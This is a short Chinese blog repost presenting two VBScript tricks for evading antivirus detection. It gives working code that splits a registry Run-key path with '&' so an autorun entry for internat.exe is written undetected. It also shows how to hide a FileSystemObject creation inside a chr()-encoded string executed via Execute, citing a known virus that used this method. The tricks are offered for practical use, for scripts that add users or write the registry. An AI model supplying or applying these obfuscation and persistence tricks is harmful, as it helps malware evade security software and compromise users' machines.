-------------------------------------------------------------------------------
轉自：http://blog.eviloctal.com/youker/

以下兩個方法在網絡上看到的，確實挺實用的，&號兩邊必須空格格開。

現在殺毒的對vbs相當敏感，只要發現對注冊表的xx作，或使用vbs運行命令（加用戶） 就可能被殺。下面談2方法可以簡單解決：

1.使用連接符"&" 如：
Set CURObj = CreateObject("WScript.Shell")
mhk="HK"&"LM\SOFT"&"WARE\Micr"&"osoft\Win"&"dows\Curren"&"tVersion\Run\"
CURObj.RegWrite ""&mhk&"internat.exe","internat.exe"

2.使用Execute函數（BY 動鯊 ）

一些殺毒軟件，如瑞星，他門會監視網頁中的代碼，一旦你創建了FSO或寫注冊表，即使是正常的腳本他也會報告危險，但是當年新歡樂時光也用了FSO怎么就沒報警呢？原因是這個病毒使用Execute這個函數來躲過了防火墻，呵呵。病毒將這段聲明代碼轉化為字符串，然后通過Execute(String)函數執行，舉個例子
str="set fso=CreateObject( " & chr(34) & "scrip" & chr(116)& "ing.FileSystemObject"&chr(34)&""
msgbox str
Execute str

文章來自: Tank部落格
引用通告: 查看所有引用 | 我要引用此文章
Tags: 殺毒軟件
相關日誌: